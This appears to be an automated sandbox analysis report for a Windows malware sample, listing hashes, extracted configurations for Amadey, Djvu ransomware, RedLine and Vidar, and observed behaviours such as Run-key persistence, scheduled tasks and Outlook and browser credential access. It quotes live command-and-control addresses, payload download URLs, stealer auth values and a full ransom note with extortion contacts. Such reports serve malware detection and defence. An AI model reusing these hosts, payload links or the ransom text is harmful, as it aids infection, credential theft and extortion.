Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
31/12/2022, 00:04 UTC
Static task
static1
Behavioral task
behavioral1
Sample
cda6fb9b5264e2fd62edd87458c89bfec48519f8f08374799791024ad2de7265.exe
Resource
win10v2004-20221111-en
General
-
Target
cda6fb9b5264e2fd62edd87458c89bfec48519f8f08374799791024ad2de7265.exe
-
Size
289KB
-
MD5
d0dc6a44b287b19296ec37b1b5d2c902
-
SHA1
5c5b53fa0c29a9d6292f941edb8cf67c24372adf
-
SHA256
cda6fb9b5264e2fd62edd87458c89bfec48519f8f08374799791024ad2de7265
-
SHA512
13c3718ece28aca82ae1323c9918be5bc0cbf47edf35e1e0fbdaefc28e44fe717fc74102436e61b79053ec6fec0df810cabb41c4173ecb225c8b2af60ed5532b
-
SSDEEP
6144:r5EiOL7re/IdRh/yJL9Wcf6QcwOk8UIkEq:VEHPre/IMWwOYI9q
Malware Config
Extracted
amadey
3.63
62.204.41.109/Nmkn5d9Dn/index.php
Extracted
djvu
http://ex3mall.com/lancer/get.php
-
extension
.znto
-
offline_id
bE95c2N1x4fARf4W3qmFCjkKPwfFkQaU9NpNBMt1
-
payload_url
http://uaery.top/dl/build2.exe
http://ex3mall.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-OKSOfVy04R Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0625Sduef
Extracted
redline
cham
31.41.244.98:4063
-
auth_value
a950c77ff7a47c51d23b247c81354ea4
Extracted
redline
8888888
82.115.223.15:15486
-
auth_value
e6af700eb78a392c4db1b1bb9017947c
Extracted
vidar
1.7
19
https://t.me/robloxblackl
https://steamcommunity.com/profiles/76561199458928097
-
profile_id
19
Signatures
-
DcRat 6 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\c8ed5026-ddb5-4746-9a75-220580a8bd81\\B9CF.exe\" --AutoStart" B9CF.exe 1532 schtasks.exe 5904 schtasks.exe 6040 schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cda6fb9b5264e2fd62edd87458c89bfec48519f8f08374799791024ad2de7265.exe 2884 schtasks.exe -
Detected Djvu ransomware 11 IoCs
resource yara_rule behavioral1/memory/4224-162-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4224-160-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4224-165-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1752-164-0x00000000022C0000-0x00000000023DB000-memory.dmp family_djvu behavioral1/memory/4224-166-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4224-230-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4224-247-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3432-299-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3432-301-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3432-308-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3432-403-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Detects LgoogLoader payload 2 IoCs
resource yara_rule behavioral1/memory/2216-236-0x0000000000D20000-0x0000000000D2D000-memory.dmp family_lgoogloader behavioral1/memory/2804-256-0x0000000000E10000-0x0000000000E1D000-memory.dmp family_lgoogloader -
Detects Smokeloader packer 2 IoCs
resource yara_rule behavioral1/memory/4356-133-0x00000000021A0000-0x00000000021A9000-memory.dmp family_smokeloader behavioral1/memory/240-189-0x0000000002060000-0x0000000002069000-memory.dmp family_smokeloader -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
LgoogLoader
A downloader capable of dropping and executing other malware families.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 167 4260 rundll32.exe 188 4216 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 34 IoCs
pid Process 1752 B9CF.exe 3332 BF00.exe 1552 C059.exe 3480 nbveek.exe 5036 nbveek.exe 240 C2BB.exe 3816 C433.exe 4224 B9CF.exe 4452 CC33.exe 1784 chum.exe 3052 CFFD.exe 4312 nbveek.exe 4812 D5F9.exe 4080 portu1.exe 4904 E5E8.exe 3720 B9CF.exe 4636 nbveek.exe 3432 B9CF.exe 5188 linda5.exe 5328 nbveek.exe 5424 anon.exe 5512 build2.exe 5552 nbveek.exe 5676 leman.exe 5816 nbveek.exe 5864 build3.exe 5396 clim.exe 5436 build2.exe 4936 745548282-j0xYuta9G35m02YL.exe 3112 64BE.exe 4896 mstsca.exe 440 nbveek.exe 2028 Otfhfhweptay.exe 5964 nbveek.exe -
resource yara_rule behavioral1/files/0x000300000001e99e-192.dat vmprotect behavioral1/files/0x000300000001e99e-191.dat vmprotect behavioral1/memory/4812-195-0x0000000140000000-0x000000014061A000-memory.dmp vmprotect behavioral1/files/0x000b0000000223e8-203.dat vmprotect behavioral1/files/0x000b0000000223e8-204.dat vmprotect behavioral1/memory/4904-206-0x0000000140000000-0x000000014061A000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation 64BE.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation C059.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation BF00.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation B9CF.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation linda5.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation B9CF.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation build2.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation leman.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation clim.exe -
Loads dropped DLL 5 IoCs
pid Process 5264 msiexec.exe 5436 build2.exe 5436 build2.exe 4260 rundll32.exe 4216 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4856 icacls.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts rundll32.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\c8ed5026-ddb5-4746-9a75-220580a8bd81\\B9CF.exe\" --AutoStart" B9CF.exe Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\chum.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000001051\\chum.exe" nbveek.exe Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\portu1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000003051\\portu1.exe" nbveek.exe Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\linda5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005051\\linda5.exe" nbveek.exe Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\clim.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000010051\\clim.exe" nbveek.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 26 api.2ip.ua 27 api.2ip.ua 84 api.2ip.ua -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2680 Process not Found 4192 chrome.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 1752 set thread context of 4224 1752 B9CF.exe 98 PID 3480 set thread context of 4312 3480 nbveek.exe 106 PID 4452 set thread context of 2216 4452 msedge.exe 117 PID 3052 set thread context of 2804 3052 CFFD.exe 132 PID 3480 set thread context of 4636 3480 nbveek.exe 148 PID 3720 set thread context of 3432 3720 B9CF.exe 150 PID 3480 set thread context of 5328 3480 nbveek.exe 155 PID 3480 set thread context of 5552 3480 nbveek.exe 157 PID 5512 set thread context of 5436 5512 build2.exe 170 PID 3112 set thread context of 3796 3112 64BE.exe 213 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\dfb8129e-f259-4597-9c88-47af77d501a5.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221231010548.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
pid pid_target Process procid_target 3120 3816 WerFault.exe 96 4740 4452 WerFault.exe 100 4804 4452 WerFault.exe 100 4540 3052 WerFault.exe 104 1540 3052 WerFault.exe 104 5588 4080 WerFault.exe 111 5296 4636 WerFault.exe 148 3392 3112 WerFault.exe 193 5092 3112 WerFault.exe 193 1144 3112 WerFault.exe 193 1904 3112 WerFault.exe 193 1404 3112 WerFault.exe 193 3456 3112 WerFault.exe 193 724 3112 WerFault.exe 193 4824 2028 WerFault.exe 211 4836 4192 WerFault.exe 218 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cda6fb9b5264e2fd62edd87458c89bfec48519f8f08374799791024ad2de7265.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C2BB.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C2BB.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C2BB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cda6fb9b5264e2fd62edd87458c89bfec48519f8f08374799791024ad2de7265.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cda6fb9b5264e2fd62edd87458c89bfec48519f8f08374799791024ad2de7265.exe -
Checks processor information in registry 2 TTPs 51 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet rundll32.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz 64BE.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 64BE.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 64BE.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data 64BE.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet rundll32.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString 64BE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 64BE.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1532 schtasks.exe 5904 schtasks.exe 6040 schtasks.exe 2884 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5708 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Toolbar Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Process not Found Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Process not Found -
Modifies registry class 21 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Process not Found Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Process not Found Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Process not Found Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" Process not Found Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff Process not Found Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Process not Found Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Process not Found -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2680 Process not Found -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4356 cda6fb9b5264e2fd62edd87458c89bfec48519f8f08374799791024ad2de7265.exe 4356 cda6fb9b5264e2fd62edd87458c89bfec48519f8f08374799791024ad2de7265.exe 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found 2680 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2680 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4356 cda6fb9b5264e2fd62edd87458c89bfec48519f8f08374799791024ad2de7265.exe 240 C2BB.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
pid Process 1080 msedge.exe 1080 msedge.exe 1080 msedge.exe 1080 msedge.exe 1080 msedge.exe 1080 msedge.exe 1080 msedge.exe 1080 msedge.exe 1080 msedge.exe 1080 msedge.exe 1080 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeDebugPrivilege 4080 portu1.exe Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 2680 Process not Found Token: SeCreatePagefilePrivilege 2680 Process not Found Token: SeShutdownPrivilege 